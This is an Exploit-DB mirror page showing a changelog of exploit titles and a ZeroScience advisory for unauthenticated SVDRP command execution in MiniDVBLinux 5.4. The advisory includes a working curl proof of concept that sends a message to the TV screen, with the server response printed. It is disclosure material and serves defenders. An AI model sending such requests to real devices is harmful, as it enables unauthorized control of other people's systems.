bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/remote/51093.txt
Exploit-DB b137003172 DB: 2023-03-28 
36 changes to exploits/shellcodes/ghdb

MiniDVBLinux 5.4  - Change Root Password
MiniDVBLinux 5.4  - Remote Root Command Injection
MiniDVBLinux 5.4 - Arbitrary File Read
MiniDVBLinux 5.4 - Unauthenticated Stream Disclosure
MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP - Remote Code Execution (RCE)
MiniDVBLinux <=5.4  - Config Download Exploit

Desktop Central 9.1.0 - Multiple Vulnerabilities

FortiOS_ FortiProxy_ FortiSwitchManager v7.2.1 - Authentication Bypass
Aero CMS v0.0.1 - PHP Code Injection (auth)
Aero CMS v0.0.1 - SQL Injection (no auth)

Atom CMS v2.0 - SQL Injection (no auth)
Canteen-Management v1.0 - SQL Injection
Canteen-Management v1.0 - XSS-Reflected

Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS)

eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE)

FlatCore CMS 2.1.1 - Stored Cross-Site Scripting (XSS)

Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE)
WebTareas 2.4 - RCE (Authorized)
WebTareas 2.4 - Reflected XSS (Unauthorised)
WebTareas 2.4 - SQL Injection (Unauthorised)

WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities

Zentao Project Management System 17.0 - Authenticated Remote Code Execution (RCE)

Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass

Grafana <=6.2.4 - HTML Injection

Hex Workshop v6.7 - Buffer overflow DoS

Scdbg 1.0 - Buffer overflow DoS

Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC)

AVS Audio Converter 10.3 - Stack Overflow (SEH)

Explorer32++ v1.3.5.531 - Buffer overflow

Frhed (Free hex editor) v1.6.0 - Buffer overflow

Gestionale Open 12.00.00 - 'DB_GO_80' Unquoted Service Path

Mediconta 3.7.27 - 'servermedicontservice' Unquoted Service Path

Resource Hacker v3.6.0.92 - Buffer overflow

Tftpd32_SE 4.60 - 'Tftpd32_svc' Unquoted Service Path

WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE)
2023-03-28 00:16:27 +00:00

53 lines
No EOL
1.7 KiB
Text
Raw Permalink Blame History

# Exploit Title: MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP - Remote Code Execution (RCE)
# Exploit Author: LiquidWorm
MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP (svdrpsend.sh) Exploit
Vendor: MiniDVBLinux
Product web page: https://www.minidvblinux.de
Affected version: <=5.4
Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
way to convert a standard PC into a Multi Media Centre based on the
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
Linux based Digital Video Recorder: Watch TV, Timer controlled
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
via browser, and a lot more. MLD strives to be as small as possible,
modular, simple. It supports numerous hardware platforms, like classic
desktops in 32/64bit and also various low power ARM systems.
Desc: The application allows the usage of the SVDRP protocol/commands
to be sent by a remote attacker to manipulate and/or control remotely
the TV.
Tested on: MiniDVBLinux 5.4
BusyBox v1.25.1
Architecture: armhf, armhf-rpi2
GNU/Linux 4.19.127.203 (armv7l)
VideoDiskRecorder 2.4.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5714
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5714.php
24.09.2022
--
Send a message to the TV screen:
curl http://ip:8008/?site=commands&section=system&command=svdrpsend.sh%20MESG%20WE%20ARE%20WATCHING%20YOU!
220 mld SVDRP VideoDiskRecorder 2.4.6; Wed Sep 28 13:07:51 2022; UTF-8
250 Message queued
221 mld closing connection
For more commands:
- https://www.linuxtv.org/vdrwiki/index.php/SVDRP#The_commands
Reference in a new issue View git blame Copy permalink